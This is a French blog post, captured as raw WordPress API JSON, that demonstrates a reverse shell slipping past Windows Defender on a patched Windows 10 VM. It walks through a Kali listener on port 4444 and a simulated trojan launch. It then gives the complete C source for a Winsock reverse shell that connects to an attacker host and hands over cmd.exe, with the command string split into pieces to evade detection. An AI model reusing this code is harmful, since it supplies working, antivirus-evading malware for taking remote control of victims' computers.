http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/ReverseShellBypassDefender.mp4<\/a><\/video><\/div>\nJe commence par lancer Kali, voir son ip et lancer un listener sur le port tcp 4444 :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-kali-ip.png\")
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-kali-server-listen.png\")
<\/p>\n
La victime maintenant, une VM sous Windows 10 compl\u00e8tement \u00e0 jour (30\/08\/2018)\u00a0 avec Windows Defender activ\u00e9 ainsi que le pare-feu de Microsoft :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-victim-uptodate.png\")
<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-victim-firewall-on.png\")
<\/p>\n
Sous Windows 10, j’ouvre l’invite de commandes et comme pour simuler le click sur un trojan, je lance le reverse shell (ici Projet1.exe) en donnant comme IP celle du Kali :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-victim-reverse-shell.png\")
<\/p>\n
Et voila, de retour sur Kali, j’ai bien un shell \u00e0 distance sur la victime, Windows Defender n\u2019a rien vu d\u2019anormal :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-kali-shell-cmd.png\")
<\/p>\n
C\u00f4t\u00e9 Windows 10 le programme Projet1.exe est termin\u00e9 mais son process enfant est bien pr\u00e9sent en m\u00e9moire, visible avec tcpview (ligne en bleue) :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/08\/defender-tcpview.png\")
<\/p>\n
Voici le code source en C de ce petit reverse shell. franchement il n’y a rien de sorcier, inqui\u00e9tant non ?<\/p>\n
#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nSOCKET Sock;\r\nstruct sockaddr_in hax;\r\nchar aip_addr[16];\r\nSTARTUPINFO ini_processo;\r\nPROCESS_INFORMATION processo_info;\r\n \r\n\r\nint main(int argc, char *argv[]) \r\n{\r\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\r\n\tWinsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);\r\n \r\n \tif (argv[1] == NULL){\r\n\t\texit(1);\r\n\t}\r\n\r\n \tstruct hostent *host;\r\n\thost = gethostbyname(argv[1]);\r\n\tstrcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n \r\n\thax.sin_family = AF_INET;\r\n\thax.sin_port = htons(atoi(argv[2]));\r\n\thax.sin_addr.s_addr =inet_addr(aip_addr);\r\n \r\n\tWSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL);\r\n\tif (WSAGetLastError() == 0) {\r\n\r\n\t\tmemset(&ini_processo, 0, sizeof(ini_processo));\r\n\r\n\t\tini_processo.cb=sizeof(ini_processo);\r\n\t\tini_processo.dwFlags=STARTF_USESTDHANDLES;\r\n\t\tini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n\t\tchar *myArray[4] = { \"cm\", \"d.e\", \"x\", \"e\" };\r\n\t\tchar command[8] = \"\";\r\n\t\tsnprintf( command, sizeof(command), \"%s%s%s%s\", myArray[0], myArray[1], myArray[2], myArray[3]);\r\n\r\n\t\tCreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\t\texit(0);\r\n\t} else {\r\n\t\texit(0);\r\n\t} \r\n}\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"Un jour je me suis demand\u00e9 s’il \u00e9tait facile ou pas de concevoir un petit reverse shell (la base des trojans) pour Windows qui ne serait pas d\u00e9tect\u00e9 par Windows Defender et le pare-feu de Microsoft. Contre toute attente \ud83d\ude42 ce fut fort simple ! Un petit code en C qui ne fait que le … Continuer la lecture de Un reverse shell qui passe sous les radars de Windows Defender (Windows 10)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-398","post","type-post","status-publish","format-standard","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=398"}],"version-history":[{"count":10,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/398\/revisions"}],"predecessor-version":[{"id":431,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/398\/revisions\/431"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}